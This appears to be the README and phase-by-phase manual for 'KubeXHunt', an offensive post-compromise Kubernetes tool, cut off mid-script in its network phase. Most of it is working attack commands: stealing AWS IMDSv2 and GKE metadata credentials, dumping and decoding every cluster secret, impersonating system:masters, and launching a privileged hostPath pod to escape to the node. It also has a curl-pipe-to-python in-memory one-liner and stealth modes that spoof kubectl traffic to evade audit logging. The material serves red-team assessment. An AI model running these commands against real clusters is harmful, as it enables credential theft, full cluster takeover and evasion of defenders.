
πŸ› οΈ KubeXHunt β€” Post-Compromise Kubernetes Attack Simulation Framework

KubeXHunt is an open-source post-compromise Kubernetes security assessment framework designed to simulate real-world attacker behavior from inside a compromised pod.

Instead of just scanning for misconfigurations, KubeXHunt demonstrates actual impact by validating access, exploiting weaknesses, and chaining findings into complete attack paths.

πŸ’‘ Think: BloodHound for Kubernetes + post-exploitation automation

Drop this tool onto any compromised pod and run a full automated assessment of the entire cluster. Zero external dependencies β€” pure Python 3 stdlib only. Runs on any pod with Python 3.6+.


Credits to Chandrapal Badshah for providing exceptional training on Kubernetes Security, which significantly contributed to the development of this tool and deepened my understanding of Kubernetes security practices.

Special thanks to Payatu for sponsoring and providing access to this training, enabling the research and development behind KubeXHunt.


Important

Starting Point: You have Remote Code Execution (RCE) inside a compromised pod. All commands are executed from inside that pod unless stated otherwise.

Philosophy: Demonstrate impact without destroying — read, enumerate, prove, document.


🤔 Why KubeXHunt?

Most Kubernetes tools answer:

"What is misconfigured?"

KubeXHunt answers:

"What can an attacker actually do with this?"

| Traditional Tools | KubeXHunt |
|---|---|
| Misconfiguration scanning | Post-compromise attack simulation |
| Static analysis | Real API access validation |
| Flat findings list | Attack path chaining |
| Assumes risk | Proves impact |

💥 In under a minute, KubeXHunt can answer:

  • Can I become cluster-admin?
  • Can I reach cloud credentials (IMDS / Workload Identity)?
  • Can I escape to the node / host?
  • Can I pivot across namespaces / workloads?

βš–οΈ Comparison with Other Tools

Tool Focus Limitation
kube-bench CIS compliance No exploitation
kube-hunter External scanning Limited post-exploitation
kubescape Misconfig scanning No attack chaining
KubeXHunt πŸ”₯ Post-compromise attack simulation Shows real impact


⬇️ Download & Run

git clone https://github.com/mr-xhunt/kubeXhunt.git
cd kubeXhunt

# Alternatively directly download the tool on the compromised pod
wget https://raw.githubusercontent.com/mr-xhunt/kubeXhunt/refs/heads/main/kubexhunt.py

# Run full assessment
python3 kubexhunt.py

🚀 Usage

python3 kubexhunt.py [OPTIONS]

Options:
  --phase N [N ...]     Run specific phase(s) only (0-26)
  --fast                Skip slow checks (port scanning, DNS brute force)
  --stealth 0|1|2       Stealth level: 0=off  1=jitter+kubectl UA  2=full evasion
  --no-mutate           Skip all mutating API calls (safe for production clusters)
  --output FILE         Save report (.json / .html / .sarif / .txt)
  --diff PREV.json      Compare with previous scan — CI/CD gate mode
  --proxy URL           Route API calls through Burp Suite or HTTP proxy
  --exclude-phase N     Skip specific phase(s)
  --phase-list          Print all 27 phases and exit
  --no-color            Disable colored output (for log files / piping)
  --kubectl-only        Only install kubectl and exit
  -h, --help            Show help

Examples:

# Full assessment — all 27 phases
python3 kubexhunt.py

# Target specific phases
python3 kubexhunt.py --phase 3 7 15 16

# Read-only silent mode — safe for production
python3 kubexhunt.py --stealth 2 --no-mutate

# Save HTML report (self-contained, dark theme)
python3 kubexhunt.py --output report.html

# Save SARIF for GitHub Code Scanning / DefectDojo
python3 kubexhunt.py --output report.sarif

# Save JSON for diff comparison
python3 kubexhunt.py --output report.json

# CI/CD mode — fail pipeline on new CRITICAL/HIGH
python3 kubexhunt.py --diff previous.json --output new.json

# Route all API calls through Burp
python3 kubexhunt.py --proxy http://127.0.0.1:8080

# Skip slow DNS brute-force and port scanning
python3 kubexhunt.py --fast

# Skip supply chain and cloud phases
python3 kubexhunt.py --exclude-phase 9 10 11 20

# List all phases with descriptions
python3 kubexhunt.py --phase-list

⚡ Quick One-Liner (no file save)

# Run directly in memory — nothing written to disk
curl -s https://raw.githubusercontent.com/mr-xhunt/kubeXhunt/refs/heads/main/kubexhunt.py | python3 - --fast

🧠 How It Works

KubeXHunt follows a real attacker workflow:

Compromised Pod
   ↓
Credential Discovery (SA tokens, env, /proc)
   ↓
Kubernetes API Exploitation (RBAC, secrets, workloads)
   ↓
Lateral Movement (services, DNS, endpoints)
   ↓
Privilege Escalation (privileged pods, host access)
   ↓
Node Compromise
   ↓
Cloud Pivot (IMDS / IAM / Workload Identity)
   ↓
⚔ Attack Path Generation

👉 Every step is validated in real time, not assumed.


📋 Phases Covered (v1.2.0 — 27 Phases)

| Phase | Name | What It Checks |
|---|---|---|
| 0 | Setup & kubectl Install | Auto-installs kubectl, searches host filesystem for existing binary, auto-configures in-cluster kubeconfig from SA token, detects cloud (AWS/GKE/Azure/OpenShift), scores token privilege |
| 1 | Pod & Container Recon | Capabilities (CapEff), seccomp, AppArmor, privileged, hostPID, hostNetwork, block devices, runtime socket, container runtime detection (containerd/docker/cri-o via host filesystem + kubectl) |
| 2 | Cloud Metadata & IAM | IMDSv1/v2 credential theft, GKE OAuth token, node SA scopes, IRSA token abuse |
| 3 | K8s API & RBAC | SA permissions, secret theft, wildcard RBAC, impersonation, bind/escalate/TokenRequest abuse, cluster-admin bindings |
| 4 | Network & Lateral Movement | Service discovery, DNS brute-force + SRV, recursive endpoint walking (advertises own endpoints), port scan, Istio/mTLS awareness, NetworkPolicy gaps, service mesh CRD detection, sniffing |
| 5 | Container Escape | nsenter, chroot, Docker/containerd socket, cgroup v1 release_agent, user namespace unshare |
| 6 | Node Compromise | Kubelet certs, projected volume SA token decode (sub field), all stolen tokens permission-tested, token privilege ranking (0-100), SSH keys, kubeconfig files |
| 7 | Cluster Escalation | Privileged pod creation, ClusterRoleBinding escalation, webhook failurePolicy bypass, etcd encryption check, controller hijacking |
| 8 | Persistence | Backdoor SA in kube-system, DaemonSet on all nodes, CronJob persistence, sidecar injection |
| 9 | Supply Chain | Image signing (webhook + Kyverno CRD fallback), registry credential pivot (catalog API probe), PSS enforcement, Kyverno v1/v2 policies (403=installed), admission plugins |
| 10 | EKS-Specific | aws-auth read/write, IRSA tokens, node IAM role, account enumeration |
| 11 | GKE-Specific | Workload Identity, node SA scopes, legacy metadata endpoint, Dashboard, project enumeration |
| 12 | Runtime Security | Multi-method detection: pod names + CRD probes + filesystem (403=installed), Tetragon TracingPolicies, Kyverno, Istio PeerAuthentication, exec-from-/tmp enforcement probe |
| 13 | Secrets & Data | Env var credential scan, mounted secret files, app config credential grep |
| 14 | DoS & Resource Limits | cgroup v1/v2 memory/CPU limits, ResourceQuota, LimitRange, audit logging (self-managed + EKS CloudWatch detection) |
| 15 | Cluster Intel & CVEs ⭐ | K8s version → real version-gated CVE comparison (no blanket fire), runc CVE-2024-21626 via containerd version mapping, kernel CVE range check (Linux only), API server public IP check, worker node public IP check, node enumeration with 5-method IP fallback |
| 16 | Kubelet Exploitation ⭐ | Real node IPs via _get_node_ips() (kubectl/kubelet config/fib_trie/hostname -I/Downward API), port 10255 anonymous, port 10250 auth bypass, /pods credential harvest |
| 17 | etcd Exposure ⭐ | Real node IPs, port 2379/2380 probe, no-TLS access, mTLS bypass, v3 keys endpoint secret dump |
| 18 | Helm & App Secrets ⭐ | Helm release secret decode (base64+gzip), imagePullSecrets cluster-wide, app filesystem credential scan |
| 19 | /proc Credential Harvest ⭐ | /proc/self/environ, co-process environ (cgroup-deduplicated from hostPID), hostPID host process scanning (kubelet/etcd/containerd only), Redis/ArgoCD token capture, Downward API node name extraction |
| 20 | Azure AKS ⭐ | IMDS instance info, Managed Identity token theft (4 resources), Workload Identity, azure.json SP creds, AAD Pod Identity NMI |
| 21 | OpenShift / OKD ⭐ | SCC enumeration, current pod SCC, route enumeration, internal registry creds, OAuth endpoint, project enumeration |
| 22 | Advanced Red Team ⭐ | SA token audience abuse, DNS poisoning via NET_ADMIN/NET_RAW, controller hijacking, token scope comparison |
| 23 | Attack Chain Simulation ⭐ | 4 real-world chains: Tesla-style IMDS breach, RBAC→Node, token theft→wildcard RBAC, webhook bypass→node escape |
| 24 | Stealth & Evasion ⭐ | Audit log impact classification, --no-mutate shows PASS (zero write operations), runtime tool presence from CTX, stealth level recommendations |
| 25 | Network Plugin & Misc ⭐ | CNI detection (Calico/Cilium/Weave/Flannel), kube-proxy mode, cluster-wide automount audit, default SA token check |
| 26 | Diff & Reporting ⭐ | JSON diff vs previous scan, new/fixed/changed findings, CI/CD exit code 1 on new CRITICAL/HIGH |

⭐ = New in v1.2.0


📊 Sample Output

╔══════════════════════════════════════════════════════════════════════════════════╗
║   ██╗  ██╗██╗   ██╗██████╗ ███████╗██╗  ██╗██╗  ██╗██╗   ██╗███╗   ██╗████████╗  ║
║   ...                                                                            ║
║   Kubernetes Security Assessment Tool  v1.2.0                                    ║
║   Starting from a Compromised Pod → Full Cluster Audit + Attack Path Discovery   ║
║   Author: Mayank Choubey                                                         ║
╚══════════════════════════════════════════════════════════════════════════════════╝

──────────────────────────────────────────────────────────────────────
  PHASE  2 │ Cloud Metadata & IAM Credentials
  IMDS credential theft, GKE metadata, OAuth token exfiltration
──────────────────────────────────────────────────────────────────────

  ▸ AWS IMDSv2 Credential Theft
  🔴 [CRITICAL] AWS IAM credentials stolen via IMDSv2
  │          Role: eks-node-group-role | KeyId: ASIA...truncated...
  │          Expires: 2026-03-18T14:30:00Z
  │          export AWS_ACCESS_KEY_ID=ASIA... AWS_SECRET_ACCESS_KEY=... AWS_SESSION_TOKEN=...
  │ ⚡ Fix:  Block 169.254.169.254/32 via NetworkPolicy

──────────────────────────────────────────────────────────────────────
  PHASE 23 │ Real-World Attack Chain Simulation
──────────────────────────────────────────────────────────────────────

  ▸ Chain 2: RBAC Misconfiguration → Privileged Pod → Node Root
  → ✓ Step 1: Can list/read secrets (RBAC misconfiguration)
  → ✓ Step 2: Can create privileged pods
  → ✓ Step 3: Privileged pod → hostPath: / → node root
  🔴 [CRITICAL] Attack Chain COMPLETE: RBAC → Privileged Pod → Node Root
  │          Path: Over-permissive RBAC → Create privileged pod with hostPath: /
  │          → chroot node → steal all kubelet tokens → pivot to every namespace

══════════════════════════════════════════════════════════════════════
  KUBEXHUNT v1.2.0 — FINAL ASSESSMENT REPORT
══════════════════════════════════════════════════════════════════════

  🔴 CRITICAL :    5
  🟠 HIGH     :   11
  🟡 MEDIUM   :    4
  🔵 LOW      :    2
  ✅ PASS     :   24
  ──────────────────────────────────────────
  Total Issues:   22

  Overall Risk: 🔴 CRITICAL RISK — Immediate action required

  ⚔  ATTACK PATH DISCOVERY
  Attack Path #1  (CRITICAL)
  Compromised Pod
     ↓ Privileged container → nsenter -t 1 → host bash
  Node Root
     ↓ Stolen SA tokens → wildcard RBAC
  Permanent Cluster Admin

πŸ” Stealth Modes

Level Flag Behavior
0 (default) Full speed, Python urllib User-Agent, no delays
1 --stealth 1 kubectl User-Agent spoofing, 0.3–2s timing jitter
2 --stealth 2 Read-only inference, batched API calls, maximum jitter, fully evasive

Combined with --no-mutate (skips all POST/PATCH/DELETE calls β€” infers from RBAC only), stealth level 2 generates zero mutating audit log entries and blends into normal kubectl traffic.


📤 Report Formats

| Format | Flag | Use Case |
|---|---|---|
| HTML | --output report.html | Self-contained dark-theme report, attack path diagrams, collapsible phase sections |
| JSON | --output report.json | Machine-readable, includes attack_paths + token_scores + summary |
| SARIF | --output report.sarif | SARIF 2.1.0 — GitHub Code Scanning, DefectDojo, any SAST pipeline |
| TXT | --output report.txt | Plain text, log-shippable, CI/CD friendly |

⚔ Attack Path Engine

KubeXHunt automatically builds a BloodHound-style attack graph across all phases. If a chain of vulnerabilities can lead from pod compromise to cluster-admin or cloud account takeover, it is printed at the end of the report as a complete step-by-step path.

Four built-in real-world chain simulations (Phase 23):

| Chain | Steps | Based On |
|---|---|---|
| Pod RCE → IMDS → Cloud Account | SA token → cloud IMDS → IAM credentials → full cloud access | Tesla cryptomining breach (2018) |
| RBAC → Privileged Pod → Node Root | Over-permissive RBAC → pod create → hostPath: / → chroot | Most common K8s privilege escalation |
| Token Theft → Wildcard RBAC → Cluster Admin | hostPath mount → steal SA tokens → find wildcard → backdoor CRB | Real-world cluster takeovers |
| Webhook Bypass → Policy Bypass → Node Escape | failurePolicy=Ignore + unreachable service → policy bypass | Silent Kyverno/OPA bypass |

πŸ† Token Privilege Scoring

Every SA token encountered (current pod + any stolen tokens) is scored 0–100 based on demonstrated API access:

  Token Privilege Ranking
  [100/100] β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ kube-system/default (stolen)
  [ 45/100] β–ˆβ–ˆβ–ˆβ–ˆβ–‘β–‘β–‘β–‘β–‘β–‘ payments/payment-api
  [ 10/100] β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘ default/webapp

  Best pivot token: kube-system/default (score 100/100)
  Abilities: list all secrets | list namespaces | list clusterrolebindings | ...

🔄 CI/CD Diff Mode

Compare two scans and automatically fail the pipeline if new CRITICAL or HIGH findings appear:

# Baseline scan
python3 kubexhunt.py --output baseline.json

# After a cluster change — diff against baseline
python3 kubexhunt.py --diff baseline.json --output new.json
# → exits with code 1 if new CRITICAL/HIGH found

Output shows new findings (regressions), fixed findings (improvements), and severity changes — allowing automated pipeline gating without manual review.


What Actually Happens — Phase-by-Phase Checklist

📋 Table of Contents

| # | Phase | Focus |
|---|---|---|
| 0 | Pre-Assessment Setup | Confirm RCE, grab SA token, auto-configure kubectl in-cluster |
| 1 | Pod & Container Recon | Capabilities, mounts, hostPID, hostNetwork |
| 2 | Cloud Metadata & IAM | AWS IMDS, GKE metadata, credential theft |
| 3 | K8s API Enumeration | RBAC exploitation, secret theft, cluster map |
| 4 | Network Recon & Lateral Movement | Service discovery, port scan, recursive endpoint walk, Istio-aware pivot |
| 5 | Container Escape | nsenter, chroot, socket, cgroup |
| 6 | Node-Level Compromise | Kubelet certs, projected token decode, full permission test on all stolen tokens |
| 7 | Cluster Privilege Escalation | Cluster-admin, privileged pods, etcd |
| 8 | Persistence | Backdoor SA, DaemonSet, sidecar injection |
| 9 | Supply Chain & Admission | Image signing (webhook + Kyverno CRD fallback), registry catalog pivot, PSS, Kyverno v1/v2 |
| 10 | EKS-Specific | aws-auth, IRSA, node IAM, CloudWatch |
| 11 | GKE-Specific | Workload Identity, legacy metadata, scopes |
| 12 | Runtime Security Gaps | Tetragon/Falco/Kyverno/Istio via pods + CRDs + filesystem, TracingPolicy, exec-from-/tmp |
| 13 | Secrets & Sensitive Data | Env vars, mounted files, app configs |
| 14 | DoS & Resource Exhaustion | cgroup v1/v2 limits, ResourceQuota, LimitRange, audit logging (self-managed + EKS CloudWatch) |
| 15 | Cluster Intel & CVEs ⭐ | Real CVE version comparison, runc version check, API server public IP, worker node public IPs, node enum with 5-method fallback |
| 16 | Kubelet Exploitation ⭐ | Real node IP via _get_node_ips(), anonymous kubelet, /pods credential harvest |
| 17 | etcd Exposure ⭐ | Real node IP probing, unauthenticated etcd, TLS bypass, secret dump |
| 18 | Helm & App Secrets ⭐ | Helm release decode, imagePullSecrets |
| 19 | /proc Harvesting ⭐ | Process env harvest, cgroup-based pod PID dedup, hostPID host-only scanning, Redis/ArgoCD capture |
| 20 | Azure AKS ⭐ | IMDS, Managed Identity, Workload Identity |
| 21 | OpenShift / OKD ⭐ | SCCs, routes, OAuth, registry |
| 22 | Advanced Red Team ⭐ | Token audience, DNS poisoning, controller hijack |
| 23 | Attack Chain Simulation ⭐ | 4 complete attack chain proofs |
| 24 | Stealth & Evasion ⭐ | Audit impact classification, --no-mutate PASS, runtime tool detection from CTX |
| 25 | Network Plugin & Misc ⭐ | CNI, kube-proxy, SA token audit |
| 26 | Diff & Reporting ⭐ | CI/CD diff, regression detection |
| ↓ | Findings Template | Severity matrix, EKS vs GKE vs Azure vs OpenShift table |

Severity Legend

| Badge | Level | Meaning | Action |
|---|---|---|---|
| 🔴 | CRITICAL | Immediate cluster or cloud account compromise | Stop assessment, report immediately |
| 🟠 | HIGH | Significant privilege escalation or data exposure | Report same day |
| 🟡 | MEDIUM | Meaningful security gap, requires chaining | Report in assessment |
| 🔵 | LOW | Defence-in-depth gap, minimal direct impact | Include in recommendations |

🔧 Phase 0: Pre-Assessment Setup

Note

Run this first. Sets up variables used throughout every other phase.

# Confirm execution context
id && whoami && hostname
uname -a
cat /etc/os-release

# Check what we can see
env | sort
cat /proc/self/status | grep -E "^Name|^Pid|^PPid|^Cap"

# Grab service account credentials (used in every Phase 3+ test)
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)
API="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}"

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "Namespace : $NS"
echo "Token     : $([ -n "$TOKEN" ] && echo "✅ PRESENT" || echo "❌ MISSING")"
echo "API       : $API"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"

# Auto-configure kubectl from SA token if kubeconfig is empty
# kubectl inside a pod has no kubeconfig by default — every command fails
# with "couldn't get current server API group list" without this step
kubectl config view | grep -q "clusters: null" && {
  echo "Configuring kubectl from SA token..."
  kubectl config set-cluster in-cluster \
    --server=$API \
    --certificate-authority=$CACERT
  kubectl config set-credentials $NS-sa --token=$TOKEN
  kubectl config set-context default \
    --cluster=in-cluster \
    --user=$NS-sa \
    --namespace=$NS
  kubectl config use-context default
  echo "✅ kubectl configured with in-cluster credentials"
}
📌 Expected Output (what to look for)
  • uid=0(root) → running as root inside container
  • CapEff: 0000003fffffffff → has capabilities
  • Token: ✅ PRESENT → can call Kubernetes API
  • Namespace other than default → tells you what workload you're in

πŸ” Phase 1: Pod & Container Recon

1.1 Capabilities Check

🔴 CRITICAL if CapEff = ffffffffffffffff — full kernel capabilities, equivalent to root on node

# Full capability dump
cat /proc/self/status | grep -E "^Cap(Eff|Prm|Inh|Bnd|Amb):"

# Human-readable decode (if capsh available)
capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')
| CapEff Value | Meaning | Severity |
|---|---|---|
| 0000000000000000 | No capabilities | ✅ Hardened |
| 00000000a80425fb | Default container caps | 🔵 Normal |
| 0000003fffffffff | Most caps present | 🟠 HIGH |
| ffffffffffffffff | ALL caps — fully privileged | 🔴 CRITICAL |

1.2 Privileged Container Check

🔴 CRITICAL — privileged = root on node with full kernel access

# seccomp status: 0 = disabled
cat /proc/self/status | grep -i "seccomp"

# Raw disk / memory devices
ls -la /dev/sda /dev/nvme0n1 2>/dev/null && echo "🔴 RAW DISK ACCESSIBLE"
ls -la /dev/mem 2>/dev/null             && echo "🔴 RAW MEMORY ACCESSIBLE"
ls /sys/kernel/debug 2>/dev/null        && echo "🟠 KERNEL DEBUG ACCESSIBLE"

1.3 Filesystem & Mount Analysis

🔴 CRITICAL if host filesystem mounted — read /etc/shadow, kubelet certs, SSH keys

# What is mounted?
cat /proc/mounts | grep -v "overlay\|proc\|sys\|dev\|tmpfs\|cgroup"

# Is root filesystem read-only? (removes its probe file if one was created)
PROBE=/.rw-probe-$(date +%s)
touch "$PROBE" 2>&1 | grep -q "Read-only" && \
  echo "✅ Read-only filesystem" || { echo "🟡 Writable root filesystem"; rm -f "$PROBE"; }

# Host filesystem check
for mountpoint in /host /hostfs /node /rootfs /mnt/host; do
  [ -d "$mountpoint" ] && ls "$mountpoint/etc" 2>/dev/null && \
    echo "🔴 HOST FILESYSTEM MOUNTED AT: $mountpoint"
done

# Find ALL writable directories
find / -writable -type d 2>/dev/null | grep -v "proc\|sys\|dev\|run\|tmp" | head -20

1.4 hostPID & hostNetwork Check

🔴 CRITICAL — hostPID allows nsenter escape; hostNetwork exposes node services

# hostPID: PID 1 = systemd/init means we see the HOST process tree
echo "PID 1 is: $(cat /proc/1/comm)"
[ "$(cat /proc/1/comm)" = "systemd" ] && echo "🔴 hostPID ENABLED" || echo "✅ Isolated PID namespace"

# hostNetwork: can we reach node-only services?
curl -s --max-time 3 http://localhost:10255/pods 2>/dev/null | \
  python3 -c "import sys,json; d=json.load(sys.stdin); print(f'🔴 KUBELET READ-ONLY EXPOSED — {len(d.get(\"items\",[]))} pods')" \
  2>/dev/null || echo "✅ Kubelet 10255 not reachable"

curl -s --max-time 3 https://localhost:10250/pods -k 2>/dev/null | head -2 && \
  echo "🔴 KUBELET AUTHENTICATED API 10250 REACHABLE"

☁️ Phase 2: Cloud Metadata & IAM Credentials

2.1 AWS IMDSv1 — No Token Required (Legacy)

🔴 CRITICAL — zero authentication required

curl -s --max-time 5 http://169.254.169.254/latest/meta-data/ 2>/dev/null && \
  echo "🔴 IMDSv1 ACCESSIBLE — NO AUTH REQUIRED" || \
  echo "✅ IMDSv1 blocked or not AWS"

2.2 AWS IMDSv2 — Full Credential Theft

🔴 CRITICAL if reachable — temporary IAM credentials for the node role

# Step 1: Get session token
IMDS_TOKEN=$(curl -s -X PUT \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
  --max-time 5 \
  http://169.254.169.254/latest/api/token 2>/dev/null)

echo "IMDS reachable: $([ -n "$IMDS_TOKEN" ] && echo "🔴 YES — CREDENTIALS AT RISK" || echo "✅ BLOCKED")"

# Step 2: Get attached IAM role
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null)
echo "IAM Role: $ROLE"

# Step 3: Steal credentials
curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE 2>/dev/null | \
  python3 -m json.tool

# Step 4: Instance identity (account ID, region)
curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
  http://169.254.169.254/latest/dynamic/instance-identity/document 2>/dev/null | \
  grep -E "accountId|region|instanceType"
🔴 Using Stolen AWS Credentials (from attacker machine)
export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="..."
export AWS_SESSION_TOKEN="..."

# Who am I?
aws sts get-caller-identity

# Enumerate permissions
aws iam list-attached-role-policies --role-name <role-name>

# ECR images
aws ecr describe-repositories
aws ecr list-images --repository-name <repo>

# EKS cluster info
aws eks list-clusters
aws eks describe-cluster --name <cluster>

# S3, Secrets Manager, SSM
aws s3 ls
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id <name>
aws ssm get-parameter --name <name> --with-decryption

2.3 GKE Metadata Server

🔴 CRITICAL if cloud-platform scope — full GCP API access

# GKE metadata
curl -s -H "Metadata-Flavor: Google" --max-time 5 \
  http://metadata.google.internal/computeMetadata/v1/ 2>/dev/null && \
  echo "🔴 GKE METADATA ACCESSIBLE" || echo "✅ Blocked or not GKE"

# Steal OAuth2 token
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" 2>/dev/null

# Node scopes (cloud-platform = full GCP access)
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes" 2>/dev/null

# Legacy endpoint β€” no header required
curl -s --max-time 5 \
  http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token \
  2>/dev/null && echo "🔴 LEGACY GKE METADATA — NO AUTH REQUIRED"

🔑 Phase 3: Kubernetes API Enumeration via RBAC

3.1 Check What the Service Account Can Do

🔴 CRITICAL if wildcard permissions

# Self-subject rules review β€” what can OUR token do?
curl -sk -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
  -d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"$NS\"}}" \
  | python3 -m json.tool 2>/dev/null

# Can we list secrets?
RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" $API/api/v1/namespaces/$NS/secrets)
echo "List secrets in $NS: $([ "$RESULT" = "200" ] && echo "🔴 ALLOWED" || echo "✅ DENIED ($RESULT)")"

# Cluster-wide?
RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" $API/api/v1/secrets)
echo "List ALL secrets cluster-wide: $([ "$RESULT" = "200" ] && echo "🔴 ALLOWED" || echo "✅ DENIED ($RESULT)")"

3.2 Dangerous Verb Check — bind / escalate / impersonate

🔴 CRITICAL — these verbs allow direct privilege escalation without creating resources

# Test impersonation as system:admin
curl -sk -H "Authorization: Bearer $TOKEN" \
  -H "Impersonate-User: system:admin" \
  -H "Impersonate-Group: system:masters" \
  $API/api/v1/namespaces | python3 -c "
import sys, json
try:
    d = json.load(sys.stdin)
    print(f'🔴 IMPERSONATION ACCEPTED — {len(d.get(\"items\",[]))} namespaces visible as system:admin')
except:
    print('✅ Impersonation rejected')
" 2>/dev/null

3.3 Secret Enumeration & Exfiltration

🔴 CRITICAL — database passwords, API keys, TLS certs, registry credentials

# List secrets with names
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/api/v1/namespaces/$NS/secrets | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for s in d.get('items', []):
    print(f'  📦 {s[\"metadata\"][\"name\"]} (type: {s.get(\"type\",\"Opaque\")})')
"

# Decode and read a specific secret
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/api/v1/namespaces/$NS/secrets/<SECRET-NAME> | \
  python3 -c "
import sys, json, base64
d = json.load(sys.stdin)
print(f'Secret: {d[\"metadata\"][\"name\"]}')
for k, v in d.get('data', {}).items():
    try:
        decoded = base64.b64decode(v).decode()
        print(f'  🔑 {k}: {decoded}')
    except:
        print(f'  🔑 {k}: <binary data>')
"

# Dump ALL secrets cluster-wide (if permitted)
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/secrets | \
  python3 -c "
import sys, json, base64
d = json.load(sys.stdin)
for item in d.get('items', []):
    ns = item['metadata']['namespace']
    name = item['metadata']['name']
    print(f'\n━━━ {ns}/{name} ━━━')
    for k, v in item.get('data', {}).items():
        try:
            decoded = base64.b64decode(v).decode()
            print(f'  {k}: {decoded[:120]}')
        except:
            print(f'  {k}: <binary>')
"

3.4 Full Cluster Enumeration

# All pods β€” build infrastructure map
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/pods | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
print(f'Total pods: {len(d.get(\"items\",[]))}')
for p in d.get('items', []):
    ns = p['metadata']['namespace']
    name = p['metadata']['name']
    node = p.get('spec', {}).get('nodeName', '?')
    status = p.get('status', {}).get('phase', '?')
    print(f'  {ns:20} {name:40} node={node} [{status}]')
"

# All services
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/services | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for s in d.get('items', []):
    ns = s['metadata']['namespace']
    name = s['metadata']['name']
    ports = [str(p.get('port','?')) for p in s.get('spec',{}).get('ports',[])]
    cip = s.get('spec',{}).get('clusterIP','')
    print(f'  {ns:20} {name:30} {cip:16} ports={\"|\".join(ports)}')
"

# Find cluster-admin bindings
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/apis/rbac.authorization.k8s.io/v1/clusterrolebindings | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for crb in d.get('items', []):
    role = crb.get('roleRef', {}).get('name', '')
    if role in ['cluster-admin', 'admin', 'edit']:
        print(f'\n🔴 POWERFUL BINDING: {crb[\"metadata\"][\"name\"]} → {role}')
        for s in crb.get('subjects', []):
            print(f'   Subject: {s.get(\"kind\")} {s.get(\"namespace\",\"\")}/{s.get(\"name\")}')
"

3.5 Create Resources (Prove Create Permissions)

🔴 CRITICAL if pod creation succeeds

# Test pod creation
RESULT=$(curl -sk -o /tmp/pod-create-out.json -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/api/v1/namespaces/$NS/pods \
  -d '{"apiVersion":"v1","kind":"Pod","metadata":{"name":"assessment-probe"},
       "spec":{"containers":[{"name":"probe","image":"busybox","command":["sleep","60"]}]}}')
echo "Pod creation: $([ "$RESULT" = "201" ] && echo "🔴 ALLOWED — $RESULT" || echo "✅ DENIED — $RESULT")"

# Escalate to privileged pod
curl -sk -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/api/v1/namespaces/$NS/pods \
  -d '{
    "apiVersion":"v1","kind":"Pod",
    "metadata":{"name":"assessment-privesc"},
    "spec":{
      "hostPID":true,"hostNetwork":true,
      "containers":[{
        "name":"escape","image":"busybox","command":["sleep","300"],
        "securityContext":{"privileged":true},
        "volumeMounts":[{"name":"host","mountPath":"/host"}]
      }],
      "volumes":[{"name":"host","hostPath":{"path":"/"}}]
    }
  }' | python3 -m json.tool

🌐 Phase 4: Network Recon & Lateral Movement

4.1 Internal Service Discovery

# K8s auto-injected service IPs
env | grep -E "_SERVICE_HOST|_SERVICE_PORT" | sort

# DNS brute-force
for svc in payment-api payments billing auth database redis postgres mysql mongodb \
           api backend internal admin vault consul; do
  ip=$(python3 -c "import socket; print(socket.gethostbyname('$svc'))" 2>/dev/null)
  [ -n "$ip" ] && echo "  ✅ FOUND: $svc → $ip"
done

# With namespace qualifiers
for ns in default kube-system web payments production staging; do
  for svc in api payment db redis; do
    ip=$(python3 -c "import socket; print(socket.gethostbyname('$svc.$ns.svc.cluster.local'))" 2>/dev/null)
    [ -n "$ip" ] && echo "  ✅ FOUND: $svc.$ns → $ip"
  done
done

4.2 Port Scanning Internal Services

# Pure Python β€” no tools required
python3 -c "
import socket
targets = ['payment-api.payments.svc.cluster.local']
ports = [80, 443, 8080, 8443, 3000, 3306, 5432, 6379, 9200, 27017, 9092, 2379]
for host in targets:
    print(f'\n━━━ {host} ━━━')
    for port in ports:
        try:
            s = socket.socket(); s.settimeout(1)
            s.connect((host, port)); print(f'  ✅ OPEN: {port}'); s.close()
